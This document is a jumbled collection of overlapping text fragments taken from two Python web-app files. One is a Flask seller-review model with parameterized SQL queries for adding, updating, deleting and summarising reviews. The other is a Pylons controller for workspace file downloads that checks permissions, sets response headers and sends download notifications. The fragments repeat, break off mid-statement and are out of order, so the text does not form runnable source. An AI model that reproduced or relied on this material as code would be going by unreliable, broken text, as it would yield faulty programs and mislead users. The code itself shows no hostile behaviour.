"self.exists = kwargs.get('exists') self.reviews = kwargs.get('reviews') self.last_review = kwargs.get('last_review') self.avg_rating = kwargs.get('avg_rating') @staticmethod",
"= offset, seller_id = seller_id) # If there exists a previous review, create",
"date_time DESC LIMIT 10 OFFSET :offset ''', user_id = user_id, offset = offset)",
"ID: ' + product_id) return 'Deleted seller review for seller ID: ' +",
"= kwargs.get('description', '') self.rating = kwargs.get('rating') self.exists = kwargs.get('exists') self.reviews = kwargs.get('reviews') self.last_review",
"user_id ''', user_id = user_id) # If there exists a previous review, create",
"= seller_id) # flash('Deleted product review for product ID: ' + product_id) return",
"= seller_id) # This means that user has not bought from this seller",
"an empty SellerReview object else: return(SellerReview(exists = False)) @staticmethod def add_review(request, seller_id): #",
"user_id, seller_id, date_time, description, rating FROM SellerReview WHERE user_id = :user_id ORDER BY",
"app, flash, redirect, render_template, request, url_for from flask_login import current_user from sqlalchemy import",
"= kwargs.get('avg_rating') @staticmethod def get(user_id, offset = 0, seller_id = None): # If",
"UPDATE SellerReview SET rating = :rating, description = :description, date_time = :date_time WHERE",
"NOT NULL REFERENCES Sellers(id), # date_time DATE NOT NULL, # description VARCHAR(256) NOT",
"seller' return 'Done' @staticmethod def update_review(request, seller_id): # Get information to add to",
"= datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description = request.form['body'] rating = request.form['numstars'] try: rows = app.db.execute(\"\"\" INSERT",
"None or user_id is None: return reviews else: return reviews[0] # Otherwise, create",
"rating, description = description, date_time = date_time, user_id = current_user.id, seller_id = seller_id)",
"def update_review(request, seller_id): # Get information to add to review date_time = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\")",
"this user except exc.IntegrityError as e: return 'you have already made a review",
"= :description, date_time = :date_time WHERE user_id = :user_id AND seller_id = :seller_id",
"= user_id, offset = offset, seller_id = seller_id) # If there exists a",
"@staticmethod def get(user_id, offset = 0, seller_id = None): # If no passed",
"user_id, offset = offset) # If `seller_id` passed in, then return review from",
"seller_id = seller_id, offset = offset) # If no passed in `seller_id`, then",
"status = 'Complete' ''', buyer_id = current_user.id, seller_id = seller_id) # This means",
"user_id = :user_id GROUP BY user_id ''', user_id = user_id) # If there",
":buyer_id AND seller_id = :seller_id AND status = 'Complete' ''', buyer_id = current_user.id,",
"= current_user.id, seller_id = seller_id) # This means that user has not bought",
"then return review from that user for the given seller elif seller_id is",
":user_id GROUP BY user_id ''', user_id = user_id) # If there exists a",
"REFERENCES Purchases(uid, pid) # ); class SellerReview: def __init__(self, **kwargs): self.user_id = kwargs.get('user_id')",
"INT NOT NULL REFERENCES Sellers(id), # date_time DATE NOT NULL, # description VARCHAR(256)",
"BY date_time DESC LIMIT 10 OFFSET :offset ''', user_id = user_id, offset =",
"Get information to add to review date_time = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description = request.form['body'] rating",
"user_id = current_user.id, seller_id = seller_id, date_time = date_time, description = description, rating",
"DATE NOT NULL, # description VARCHAR(256) NOT NULL, # rating DECIMAL(10, 2) NOT",
"seller_id) # FOREIGN KEY (user_id, seller_id) REFERENCES Purchases(uid, pid) # ); class SellerReview:",
"seller_id = :seller_id LIMIT 10 OFFSET :offset ''', user_id = user_id, offset =",
"user elif seller_id is None: rows = app.db.execute(''' SELECT user_id, seller_id, date_time, description,",
"return just the first element, not the list if seller_id is None or",
"If no passed in `user_id`, then return all reviews for that seller if",
"flask_login import current_user from sqlalchemy import exc import datetime # Reviews of Sellers",
"'you have already made a review for this seller' return 'Done' @staticmethod def",
"render_template, request, url_for from flask_login import current_user from sqlalchemy import exc import datetime",
"description = :description, date_time = :date_time WHERE user_id = :user_id AND seller_id =",
"if user_id is None: rows = app.db.execute(''' SELECT user_id, seller_id, date_time, description, rating",
"means already a review for this seller from this user except exc.IntegrityError as",
"seller_id @staticmethod def get_review_stats(user_id): rows = app.db.execute(''' SELECT user_id, COUNT(*) AS reviews, MAX(date_time)",
"'you have not had a completed purchase from this seller' # Get information",
"VALUES(:user_id, :seller_id, :date_time, :description, :rating) RETURNING user_id \"\"\", user_id = current_user.id, seller_id =",
"review date_time = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description = request.form['body'] rating = request.form['numstars'] rows = app.db.execute(\"\"\"",
"SellerReview WHERE seller_id = :seller_id ORDER BY date_time DESC LIMIT 10 OFFSET :offset",
"= seller_id) return 'Done' @staticmethod def delete_review(seller_id): rows = app.db.execute(\"\"\" DELETE FROM SellerReview",
"row[1], last_review = row[2], avg_rating = row[3], exists = True) for row in",
"# PRIMARY KEY (user_id, seller_id) # FOREIGN KEY (user_id, seller_id) REFERENCES Purchases(uid, pid)",
"BY date_time DESC LIMIT 10 OFFSET :offset ''', seller_id = seller_id, offset =",
"offset, seller_id = seller_id) # If there exists a previous review, create the",
"seller_id is not None: rows = app.db.execute(''' SELECT user_id, seller_id, date_time, description, rating",
"the object if rows: return [SellerReview(user_id = row[0], reviews = row[1], last_review =",
"= :date_time WHERE user_id = :user_id AND seller_id = :seller_id RETURNING user_id \"\"\",",
"import datetime # Reviews of Sellers # CREATE TABLE SellerReview ( # user_id",
"seller_id, date_time, description, rating FROM SellerReview WHERE seller_id = :seller_id ORDER BY date_time",
"'Deleted seller review for seller ID: ' + seller_id @staticmethod def get_review_stats(user_id): rows",
"review for this seller' return 'Done' @staticmethod def update_review(request, seller_id): # Get information",
"review for product ID: ' + product_id) return 'Deleted seller review for seller",
"request.form['body'] rating = request.form['numstars'] rows = app.db.execute(\"\"\" UPDATE SellerReview SET rating = :rating,",
"seller_id = seller_id) return 'Done' @staticmethod def delete_review(seller_id): rows = app.db.execute(\"\"\" DELETE FROM",
"return [SellerReview(user_id = row[0], reviews = row[1], last_review = row[2], avg_rating = row[3],",
"url_for from flask_login import current_user from sqlalchemy import exc import datetime # Reviews",
"if rows: reviews = [SellerReview(user_id = row[0], seller_id = row[1], date_time = row[2],",
"= app.db.execute(\"\"\" UPDATE SellerReview SET rating = :rating, description = :description, date_time =",
"return 'you have not had a completed purchase from this seller' # Get",
"create the object if rows: return [SellerReview(user_id = row[0], reviews = row[1], last_review",
"if rows: return [SellerReview(user_id = row[0], reviews = row[1], last_review = row[2], avg_rating",
"given seller elif seller_id is not None: rows = app.db.execute(''' SELECT user_id, seller_id,",
"date_time = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description = request.form['body'] rating = request.form['numstars'] try: rows = app.db.execute(\"\"\"",
"description, rating FROM SellerReview WHERE user_id = :user_id ORDER BY date_time DESC LIMIT",
"is None: return reviews else: return reviews[0] # Otherwise, create an empty SellerReview",
"request.form['numstars'] try: rows = app.db.execute(\"\"\" INSERT INTO SellerReview(user_id, seller_id, date_time, description, rating) VALUES(:user_id,",
"= current_user.id, seller_id = seller_id) # flash('Deleted product review for product ID: '",
"for that seller if user_id is None: rows = app.db.execute(''' SELECT user_id, seller_id,",
"rows = app.db.execute(\"\"\" UPDATE SellerReview SET rating = :rating, description = :description, date_time",
"this seller rows = app.db.execute(''' SELECT order_id FROM Purchases WHERE buyer_id = :buyer_id",
"user_id \"\"\", user_id = current_user.id, seller_id = seller_id) # flash('Deleted product review for",
"= date_time, description = description, rating = rating) # This means already a",
"None: return reviews else: return reviews[0] # Otherwise, create an empty SellerReview object",
"date_time = :date_time WHERE user_id = :user_id AND seller_id = :seller_id RETURNING user_id",
"app.db.execute(\"\"\" DELETE FROM SellerReview WHERE user_id = :user_id AND seller_id = :seller_id RETURNING",
"to add to review date_time = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description = request.form['body'] rating = request.form['numstars']",
"= row[0], seller_id = row[1], date_time = row[2], description = row[3], rating =",
"description = description, rating = rating) # This means already a review for",
"seller_id) # flash('Deleted product review for product ID: ' + product_id) return 'Deleted",
"= 0, seller_id = None): # If no passed in `user_id`, then return",
"= None): # If no passed in `user_id`, then return all reviews for",
"current_user.id, seller_id = seller_id, date_time = date_time, description = description, rating = rating)",
"REFERENCES Users(id), # seller_id INT NOT NULL REFERENCES Sellers(id), # date_time DATE NOT",
"class SellerReview: def __init__(self, **kwargs): self.user_id = kwargs.get('user_id') self.seller_id = kwargs.get('seller_id') self.date_time =",
"VARCHAR(256) NOT NULL, # rating DECIMAL(10, 2) NOT NULL CHECK(rating >= 1 AND",
"from sqlalchemy import exc import datetime # Reviews of Sellers # CREATE TABLE",
"sqlalchemy import exc import datetime # Reviews of Sellers # CREATE TABLE SellerReview",
":seller_id LIMIT 10 OFFSET :offset ''', user_id = user_id, offset = offset, seller_id",
"completed purchase from this seller' # Get information to add to review date_time",
"list if seller_id is None or user_id is None: return reviews else: return",
"no passed in `user_id`, then return all reviews for that seller if user_id",
"= True) for row in rows] # If no seller_id passed in, return",
"to see if the user has bought from this seller rows = app.db.execute('''",
"add_review(request, seller_id): # Add in a check to see if the user has",
"' + product_id) return 'Deleted seller review for seller ID: ' + seller_id",
"object else: return(SellerReview(exists = False)) @staticmethod def add_review(request, seller_id): # Add in a",
"AND seller_id = :seller_id RETURNING user_id \"\"\", rating = rating, description = description,",
"date_time = date_time, user_id = current_user.id, seller_id = seller_id) return 'Done' @staticmethod def",
":description, date_time = :date_time WHERE user_id = :user_id AND seller_id = :seller_id RETURNING",
"product review for product ID: ' + product_id) return 'Deleted seller review for",
"seller_id = :seller_id RETURNING user_id \"\"\", user_id = current_user.id, seller_id = seller_id) #",
"rows = app.db.execute(''' SELECT user_id, seller_id, date_time, description, rating FROM SellerReview WHERE seller_id",
"else: return(SellerReview(exists = False)) @staticmethod def add_review(request, seller_id): # Add in a check",
"for this seller' return 'Done' @staticmethod def update_review(request, seller_id): # Get information to",
"date_time, description, rating FROM SellerReview WHERE user_id = :user_id ORDER BY date_time DESC",
"# If no passed in `seller_id`, then return all reviews from that user",
"NULL, # rating DECIMAL(10, 2) NOT NULL CHECK(rating >= 1 AND rating <=",
"reviews[0] # Otherwise, create an empty SellerReview object else: return(SellerReview(exists = False)) @staticmethod",
"\"\"\", user_id = current_user.id, seller_id = seller_id) # flash('Deleted product review for product",
"= kwargs.get('rating') self.exists = kwargs.get('exists') self.reviews = kwargs.get('reviews') self.last_review = kwargs.get('last_review') self.avg_rating =",
"False)) @staticmethod def add_review(request, seller_id): # Add in a check to see if",
"seller from this user except exc.IntegrityError as e: return 'you have already made",
"user_id, offset = offset, seller_id = seller_id) # If there exists a previous",
"if seller_id is None or user_id is None: return reviews else: return reviews[0]",
"AND seller_id = :seller_id RETURNING user_id \"\"\", user_id = current_user.id, seller_id = seller_id)",
"rows: reviews = [SellerReview(user_id = row[0], seller_id = row[1], date_time = row[2], description",
"reviews = row[1], last_review = row[2], avg_rating = row[3], exists = True) for",
"offset = offset) # If `seller_id` passed in, then return review from that",
"SellerReview WHERE user_id = :user_id AND seller_id = :seller_id RETURNING user_id \"\"\", user_id"
] |
[
"download from this path. kfs_dir = kfs_node.parent if not kfs_dir: raise Exception(\"Public workspace",
"share_id=%i\" + \\ \", inode_id=%i, commit_id=%i, pubws_email_id=%i.\") % \\ ( workspace_id, user_id, kfs_node.share_id,",
"kfs_node.inode_id, kfs_node.commit_id, pubws_email_id ) ) except Exception, e: log.error(\"Sending download notification failed: '%s'.\"",
"as c from pylons.controllers.util import abort, redirect_to from kwmo.lib.base import BaseController, render from",
"#if cencoding: # response.headers['Content-Encoding'] = cencoding response.headers['Content-disposition'] = str('attachment; filename=\"%s\"' % ( kfs_node.name.encode('latin1')",
"send an errror file? return abort(403) # Get kfs_file object from request. web_kfs_file_json",
"kfs_dir_parent: raise Exception(\"Public workspace file download: bad directory(2).\") if kfs_dir_parent.parent_inode_id != KFS_ROOT_INODE_ID: raise",
"from this path. kfs_dir = kfs_node.parent if not kfs_dir: raise Exception(\"Public workspace file",
"errror file? return abort(403) # Get kfs_file object from request. web_kfs_file_json = request.params.get('kfs_file')",
"object from request. web_kfs_file_json = request.params.get('kfs_file') web_kfs_file_dict = simplejson.loads(web_kfs_file_json) web_kfs_file = WebKFSFile().from_dict(web_kfs_file_dict) assert",
"workspace file download: bad directory(3).\"); identities_emails = map(lambda x: x['email'], session['identities']) if kfs_dir_parent.name",
"x['email'], session['identities']) if kfs_dir_parent.name not in identities_emails: raise Exception(\"Public workspace file download: bad",
"== 'open': # Guest mime type import mimetypes ctype, cencoding = mimetypes.guess_type(kfs_node.name, False)",
"node associted to it. kfs_node = KfsNode.get_by(workspace_id=workspace_id, share_id=web_kfs_file.share_id, inode_id=web_kfs_file.inode_id) if c.workspace.public and not",
"if not ctype: # Download mime type ctype, cencoding = ('application/octet-stream', None) kfs_files",
"failed: '%s'.\" % ( str(e) ) ) else: log.debug(\"Not sending download notification: user",
"abort, redirect_to from kwmo.lib.base import BaseController, render from kfs_lib import * from kwmo.lib.file_download",
"workspace file download: bad directory(1).\") kfs_dir_parent = kfs_dir.parent if not kfs_dir_parent: raise Exception(\"Public",
"# Get kfs_file object from request. web_kfs_file_json = request.params.get('kfs_file') web_kfs_file_dict = simplejson.loads(web_kfs_file_json) web_kfs_file",
") ) except Exception, e: log.error(\"Sending download notification failed: '%s'.\" % ( str(e)",
"IE. response.headers['Cache-Control'] = 'maxage=3600' response.headers['Pragma'] = 'public' if self.send_notification: # Send download notification",
"this path. kfs_dir = kfs_node.parent if not kfs_dir: raise Exception(\"Public workspace file download:",
"pubws_email_id=%i.\") % \\ ( workspace_id, user_id, kfs_node.share_id, kfs_node.inode_id, kfs_node.commit_id, pubws_email_id ) ) except",
"[kfs_node.to_dict()] # Set the content type and the headers. response.headers['Content-Type'] = ctype #if",
"download notification: user is admin: workspace_id=%i, user_id=%i.\" % \\ ( workspace_id, user_id )",
"user_id=%i.\" % \\ ( workspace_id, user_id ) ) return kfs_download_generator(kcd_conf, kfs_node.workspace_id, kfs_node.share_id, user_id,",
"0 if c.workspace.public: pubws_email_id = session['email_id'] kc = KcdClient(kcd_conf) try: kc.send_download_notification(workspace_id, user_id, kfs_node.share_id,",
"\\ ( workspace_id, user_id, kfs_node.share_id, kfs_node.inode_id, kfs_node.commit_id, pubws_email_id ) ) except Exception, e:",
"mimetypes.guess_type(kfs_node.name, True) # strict if not ctype: # Download mime type ctype, cencoding",
"% ( kfs_node.name.encode('latin1') )) response.headers['Content-Transfer-Encoding'] = 'binary' # Use a custom header that",
"raise Exception(\"Public workspace file download: bad directory(3).\"); identities_emails = map(lambda x: x['email'], session['identities'])",
"= get_kfs_skurl_subject(session['email_info']['date'], session['email_info']['subject']) if kfs_dir.name != expected_dir_name: raise Exception(\"Public workspace file download: bad",
"c.perms.hasPerm('kfs.download.share.%i' % (share_id)): log.error(\"File download denied: user has not the right permissions.\") #",
"for the download to work on IE. response.headers['Cache-Control'] = 'maxage=3600' response.headers['Pragma'] = 'public'",
"These headers are necessary for the download to work on IE. response.headers['Cache-Control'] =",
"a middleware (workaround for # the Content-Length header being dropped somewhere in pylons).",
"kfs_dir.name == \"Original attachments\": kfs_dir = kfs_dir.parent expected_dir_name = get_kfs_skurl_subject(session['email_info']['date'], session['email_info']['subject']) if kfs_dir.name",
"response, session,config, tmpl_context as c from pylons.controllers.util import abort, redirect_to from kwmo.lib.base import",
"from kfs_lib import * from kwmo.lib.file_download import kfs_download_generator from kwmo.model.kfs_node import KfsNode from",
"kfs_files = [kfs_node.to_dict()] # Set the content type and the headers. response.headers['Content-Type'] =",
"FileDownloadController(BaseController): requires_auth = ['download'] # Send download notifications. send_notification = True # Download",
"= True # Download a file. def download(self, workspace_id): workspace_id = int(workspace_id) #",
"file. def download(self, workspace_id): workspace_id = int(workspace_id) # Shortcuts share_id = 0 user_id",
"that will be replaced in a middleware (workaround for # the Content-Length header",
"somewhere in pylons). response.headers['X-Content-Length'] = str(kfs_node.file_size) # These headers are necessary for the",
"directory(0).\") if kfs_dir.name == \"Original attachments\": kfs_dir = kfs_dir.parent expected_dir_name = get_kfs_skurl_subject(session['email_info']['date'], session['email_info']['subject'])",
"file? return abort(403) # Get kfs_file object from request. web_kfs_file_json = request.params.get('kfs_file') web_kfs_file_dict",
"= 0 user_id = session['user']['id'] kcd_conf = get_cached_kcd_external_conf_object() # Permissions verification if not",
"mimetypes.guess_type(kfs_node.name, False) # not strict #ctype, cencoding = mimetypes.guess_type(kfs_node.name, True) # strict if",
"custom header that will be replaced in a middleware (workaround for # the",
"import kfs_download_generator from kwmo.model.kfs_node import KfsNode from kwmo.lib.kwmo_kcd_client import KcdClient from kwmo.lib.config import",
"cencoding response.headers['Content-disposition'] = str('attachment; filename=\"%s\"' % ( kfs_node.name.encode('latin1') )) response.headers['Content-Transfer-Encoding'] = 'binary' #",
"bad directory(0).\") if kfs_dir.name == \"Original attachments\": kfs_dir = kfs_dir.parent expected_dir_name = get_kfs_skurl_subject(session['email_info']['date'],",
"raise Exception(\"Public workspace file download: bad directory(1).\") kfs_dir_parent = kfs_dir.parent if not kfs_dir_parent:",
"!= KFS_ROOT_INODE_ID: raise Exception(\"Public workspace file download: bad directory(3).\"); identities_emails = map(lambda x:",
"KcdClient(kcd_conf) try: kc.send_download_notification(workspace_id, user_id, kfs_node.share_id, kfs_node.inode_id, kfs_node.commit_id, pubws_email_id) log.debug((\"Sent download notification: workspace_id=%i, user_id=%i,",
"download: bad directory(1).\") kfs_dir_parent = kfs_dir.parent if not kfs_dir_parent: raise Exception(\"Public workspace file",
"class FileDownloadController(BaseController): requires_auth = ['download'] # Send download notifications. send_notification = True #",
"log.error(\"File download denied: user has not the right permissions.\") # FIXME download permission",
"directory(3).\"); identities_emails = map(lambda x: x['email'], session['identities']) if kfs_dir_parent.name not in identities_emails: raise",
"( workspace_id, user_id, kfs_node.share_id, kfs_node.inode_id, kfs_node.commit_id, pubws_email_id ) ) except Exception, e: log.error(\"Sending",
"ctype = None if mode == 'open': # Guest mime type import mimetypes",
"# Check that the user has rights to download from this path. kfs_dir",
"'binary' # Use a custom header that will be replaced in a middleware",
"kc.send_download_notification(workspace_id, user_id, kfs_node.share_id, kfs_node.inode_id, kfs_node.commit_id, pubws_email_id) log.debug((\"Sent download notification: workspace_id=%i, user_id=%i, share_id=%i\" +",
"403 error: send an errror file? return abort(403) # Get kfs_file object from",
"Exception(\"Public workspace file download: bad directory(4).\"); # Get download mode. mode = request.params.get('mode',",
"+ \\ \", inode_id=%i, commit_id=%i, pubws_email_id=%i.\") % \\ ( workspace_id, user_id, kfs_node.share_id, kfs_node.inode_id,",
"cencoding = mimetypes.guess_type(kfs_node.name, False) # not strict #ctype, cencoding = mimetypes.guess_type(kfs_node.name, True) #",
"= request.params.get('kfs_file') web_kfs_file_dict = simplejson.loads(web_kfs_file_json) web_kfs_file = WebKFSFile().from_dict(web_kfs_file_dict) assert web_kfs_file.workspace_id == workspace_id assert",
"kwmo.lib.file_download import kfs_download_generator from kwmo.model.kfs_node import KfsNode from kwmo.lib.kwmo_kcd_client import KcdClient from kwmo.lib.config",
"mode = request.params.get('mode', 'save') ctype = None if mode == 'open': # Guest",
"kfs_dir_parent.parent_inode_id != KFS_ROOT_INODE_ID: raise Exception(\"Public workspace file download: bad directory(3).\"); identities_emails = map(lambda",
"attachments\": kfs_dir = kfs_dir.parent expected_dir_name = get_kfs_skurl_subject(session['email_info']['date'], session['email_info']['subject']) if kfs_dir.name != expected_dir_name: raise",
"rid of 403 error: send an errror file? return abort(403) # Get kfs_file",
"KcdClient from kwmo.lib.config import get_cached_kcd_external_conf_object log = logging.getLogger(__name__) class FileDownloadController(BaseController): requires_auth = ['download']",
"# Permissions verification if not c.perms.hasPerm('kfs.download.share.%i' % (share_id)): log.error(\"File download denied: user has",
"expected_dir_name: raise Exception(\"Public workspace file download: bad directory(1).\") kfs_dir_parent = kfs_dir.parent if not",
"download notification: workspace_id=%i, user_id=%i, share_id=%i\" + \\ \", inode_id=%i, commit_id=%i, pubws_email_id=%i.\") % \\",
"# Shortcuts share_id = 0 user_id = session['user']['id'] kcd_conf = get_cached_kcd_external_conf_object() # Permissions",
"directory(2).\") if kfs_dir_parent.parent_inode_id != KFS_ROOT_INODE_ID: raise Exception(\"Public workspace file download: bad directory(3).\"); identities_emails",
"bad directory(4).\"); # Get download mode. mode = request.params.get('mode', 'save') ctype = None",
"= cencoding response.headers['Content-disposition'] = str('attachment; filename=\"%s\"' % ( kfs_node.name.encode('latin1') )) response.headers['Content-Transfer-Encoding'] = 'binary'",
"kfs_lib import * from kwmo.lib.file_download import kfs_download_generator from kwmo.model.kfs_node import KfsNode from kwmo.lib.kwmo_kcd_client",
"response.headers['Content-Transfer-Encoding'] = 'binary' # Use a custom header that will be replaced in",
"\", inode_id=%i, commit_id=%i, pubws_email_id=%i.\") % \\ ( workspace_id, user_id, kfs_node.share_id, kfs_node.inode_id, kfs_node.commit_id, pubws_email_id",
"Get the kfs node associted to it. kfs_node = KfsNode.get_by(workspace_id=workspace_id, share_id=web_kfs_file.share_id, inode_id=web_kfs_file.inode_id) if",
"identities_emails: raise Exception(\"Public workspace file download: bad directory(4).\"); # Get download mode. mode",
"workspace_id = int(workspace_id) # Shortcuts share_id = 0 user_id = session['user']['id'] kcd_conf =",
"download: bad directory(3).\"); identities_emails = map(lambda x: x['email'], session['identities']) if kfs_dir_parent.name not in",
"= int(workspace_id) # Shortcuts share_id = 0 user_id = session['user']['id'] kcd_conf = get_cached_kcd_external_conf_object()",
"Download a file. def download(self, workspace_id): workspace_id = int(workspace_id) # Shortcuts share_id =",
"Get download mode. mode = request.params.get('mode', 'save') ctype = None if mode ==",
"Set the content type and the headers. response.headers['Content-Type'] = ctype #if cencoding: #",
"if not c.perms.hasPerm('kfs.download.share.%i' % (share_id)): log.error(\"File download denied: user has not the right",
"workspace file download: bad directory(0).\") if kfs_dir.name == \"Original attachments\": kfs_dir = kfs_dir.parent",
"the content type and the headers. response.headers['Content-Type'] = ctype #if cencoding: # response.headers['Content-Encoding']",
"file download: bad directory(4).\"); # Get download mode. mode = request.params.get('mode', 'save') ctype",
"response.headers['Pragma'] = 'public' if self.send_notification: # Send download notification to KCD. pubws_email_id =",
"assert web_kfs_file.workspace_id == workspace_id assert web_kfs_file.share_id == share_id # Get the kfs node",
"mime type import mimetypes ctype, cencoding = mimetypes.guess_type(kfs_node.name, False) # not strict #ctype,",
"download: bad directory(2).\") if kfs_dir_parent.parent_inode_id != KFS_ROOT_INODE_ID: raise Exception(\"Public workspace file download: bad",
"'%s'.\" % ( str(e) ) ) else: log.debug(\"Not sending download notification: user is",
"not c.perms.hasPerm('kfs.download.share.%i' % (share_id)): log.error(\"File download denied: user has not the right permissions.\")",
"pylons.controllers.util import abort, redirect_to from kwmo.lib.base import BaseController, render from kfs_lib import *",
"= ['download'] # Send download notifications. send_notification = True # Download a file.",
"kfs_node.commit_id, pubws_email_id ) ) except Exception, e: log.error(\"Sending download notification failed: '%s'.\" %",
"bad directory(3).\"); identities_emails = map(lambda x: x['email'], session['identities']) if kfs_dir_parent.name not in identities_emails:",
"str(kfs_node.file_size) # These headers are necessary for the download to work on IE.",
"pubws_email_id ) ) except Exception, e: log.error(\"Sending download notification failed: '%s'.\" % (",
"notification failed: '%s'.\" % ( str(e) ) ) else: log.debug(\"Not sending download notification:",
") else: log.debug(\"Not sending download notification: user is admin: workspace_id=%i, user_id=%i.\" % \\",
"type and the headers. response.headers['Content-Type'] = ctype #if cencoding: # response.headers['Content-Encoding'] = cencoding",
"session['email_info']['subject']) if kfs_dir.name != expected_dir_name: raise Exception(\"Public workspace file download: bad directory(1).\") kfs_dir_parent",
"# Send download notification to KCD. pubws_email_id = 0 if c.workspace.public: pubws_email_id =",
"web_kfs_file_dict = simplejson.loads(web_kfs_file_json) web_kfs_file = WebKFSFile().from_dict(web_kfs_file_dict) assert web_kfs_file.workspace_id == workspace_id assert web_kfs_file.share_id ==",
"sending download notification: user is admin: workspace_id=%i, user_id=%i.\" % \\ ( workspace_id, user_id",
"kfs_dir.parent if not kfs_dir_parent: raise Exception(\"Public workspace file download: bad directory(2).\") if kfs_dir_parent.parent_inode_id",
"the Content-Length header being dropped somewhere in pylons). response.headers['X-Content-Length'] = str(kfs_node.file_size) # These",
"kfs_node.parent if not kfs_dir: raise Exception(\"Public workspace file download: bad directory(0).\") if kfs_dir.name",
"Exception(\"Public workspace file download: bad directory(3).\"); identities_emails = map(lambda x: x['email'], session['identities']) if",
"# response.headers['Content-Encoding'] = cencoding response.headers['Content-disposition'] = str('attachment; filename=\"%s\"' % ( kfs_node.name.encode('latin1') )) response.headers['Content-Transfer-Encoding']",
"% \\ ( workspace_id, user_id ) ) return kfs_download_generator(kcd_conf, kfs_node.workspace_id, kfs_node.share_id, user_id, kfs_files)",
"user_id = session['user']['id'] kcd_conf = get_cached_kcd_external_conf_object() # Permissions verification if not c.perms.hasPerm('kfs.download.share.%i' %",
"kfs_dir: raise Exception(\"Public workspace file download: bad directory(0).\") if kfs_dir.name == \"Original attachments\":",
"web_kfs_file_json = request.params.get('kfs_file') web_kfs_file_dict = simplejson.loads(web_kfs_file_json) web_kfs_file = WebKFSFile().from_dict(web_kfs_file_dict) assert web_kfs_file.workspace_id == workspace_id",
"(share_id)): log.error(\"File download denied: user has not the right permissions.\") # FIXME download",
"% (share_id)): log.error(\"File download denied: user has not the right permissions.\") # FIXME",
"is admin: workspace_id=%i, user_id=%i.\" % \\ ( workspace_id, user_id ) ) return kfs_download_generator(kcd_conf,",
"import time from pylons import request, response, session,config, tmpl_context as c from pylons.controllers.util",
"c.is_admin: # Check that the user has rights to download from this path.",
"that the user has rights to download from this path. kfs_dir = kfs_node.parent",
"to it. kfs_node = KfsNode.get_by(workspace_id=workspace_id, share_id=web_kfs_file.share_id, inode_id=web_kfs_file.inode_id) if c.workspace.public and not c.is_admin: #",
"a custom header that will be replaced in a middleware (workaround for #",
"abort(403) # Get kfs_file object from request. web_kfs_file_json = request.params.get('kfs_file') web_kfs_file_dict = simplejson.loads(web_kfs_file_json)",
"from pylons.controllers.util import abort, redirect_to from kwmo.lib.base import BaseController, render from kfs_lib import",
"\"Original attachments\": kfs_dir = kfs_dir.parent expected_dir_name = get_kfs_skurl_subject(session['email_info']['date'], session['email_info']['subject']) if kfs_dir.name != expected_dir_name:",
"kfs_dir.name != expected_dir_name: raise Exception(\"Public workspace file download: bad directory(1).\") kfs_dir_parent = kfs_dir.parent",
"kwmo.lib.config import get_cached_kcd_external_conf_object log = logging.getLogger(__name__) class FileDownloadController(BaseController): requires_auth = ['download'] # Send",
"has rights to download from this path. kfs_dir = kfs_node.parent if not kfs_dir:",
"('application/octet-stream', None) kfs_files = [kfs_node.to_dict()] # Set the content type and the headers.",
"* from kwmo.lib.file_download import kfs_download_generator from kwmo.model.kfs_node import KfsNode from kwmo.lib.kwmo_kcd_client import KcdClient",
"( str(e) ) ) else: log.debug(\"Not sending download notification: user is admin: workspace_id=%i,",
"kfs_download_generator from kwmo.model.kfs_node import KfsNode from kwmo.lib.kwmo_kcd_client import KcdClient from kwmo.lib.config import get_cached_kcd_external_conf_object",
"( kfs_node.name.encode('latin1') )) response.headers['Content-Transfer-Encoding'] = 'binary' # Use a custom header that will",
"= 'binary' # Use a custom header that will be replaced in a",
"get rid of 403 error: send an errror file? return abort(403) # Get",
"kfs_node.name.encode('latin1') )) response.headers['Content-Transfer-Encoding'] = 'binary' # Use a custom header that will be",
"['download'] # Send download notifications. send_notification = True # Download a file. def",
"FIXME download permission error: get rid of 403 error: send an errror file?",
"get_kfs_skurl_subject(session['email_info']['date'], session['email_info']['subject']) if kfs_dir.name != expected_dir_name: raise Exception(\"Public workspace file download: bad directory(1).\")",
"Shortcuts share_id = 0 user_id = session['user']['id'] kcd_conf = get_cached_kcd_external_conf_object() # Permissions verification",
"download(self, workspace_id): workspace_id = int(workspace_id) # Shortcuts share_id = 0 user_id = session['user']['id']",
"user has not the right permissions.\") # FIXME download permission error: get rid",
"simplejson.loads(web_kfs_file_json) web_kfs_file = WebKFSFile().from_dict(web_kfs_file_dict) assert web_kfs_file.workspace_id == workspace_id assert web_kfs_file.share_id == share_id #",
"mimetypes ctype, cencoding = mimetypes.guess_type(kfs_node.name, False) # not strict #ctype, cencoding = mimetypes.guess_type(kfs_node.name,",
"% \\ ( workspace_id, user_id, kfs_node.share_id, kfs_node.inode_id, kfs_node.commit_id, pubws_email_id ) ) except Exception,",
"0 user_id = session['user']['id'] kcd_conf = get_cached_kcd_external_conf_object() # Permissions verification if not c.perms.hasPerm('kfs.download.share.%i'",
"ctype #if cencoding: # response.headers['Content-Encoding'] = cencoding response.headers['Content-disposition'] = str('attachment; filename=\"%s\"' % (",
"Get kfs_file object from request. web_kfs_file_json = request.params.get('kfs_file') web_kfs_file_dict = simplejson.loads(web_kfs_file_json) web_kfs_file =",
"permissions.\") # FIXME download permission error: get rid of 403 error: send an",
"workspace_id=%i, user_id=%i, share_id=%i\" + \\ \", inode_id=%i, commit_id=%i, pubws_email_id=%i.\") % \\ ( workspace_id,",
"= ('application/octet-stream', None) kfs_files = [kfs_node.to_dict()] # Set the content type and the",
"download mode. mode = request.params.get('mode', 'save') ctype = None if mode == 'open':",
"being dropped somewhere in pylons). response.headers['X-Content-Length'] = str(kfs_node.file_size) # These headers are necessary",
"if kfs_dir_parent.parent_inode_id != KFS_ROOT_INODE_ID: raise Exception(\"Public workspace file download: bad directory(3).\"); identities_emails =",
"ctype, cencoding = ('application/octet-stream', None) kfs_files = [kfs_node.to_dict()] # Set the content type",
"download to work on IE. response.headers['Cache-Control'] = 'maxage=3600' response.headers['Pragma'] = 'public' if self.send_notification:",
"== \"Original attachments\": kfs_dir = kfs_dir.parent expected_dir_name = get_kfs_skurl_subject(session['email_info']['date'], session['email_info']['subject']) if kfs_dir.name !=",
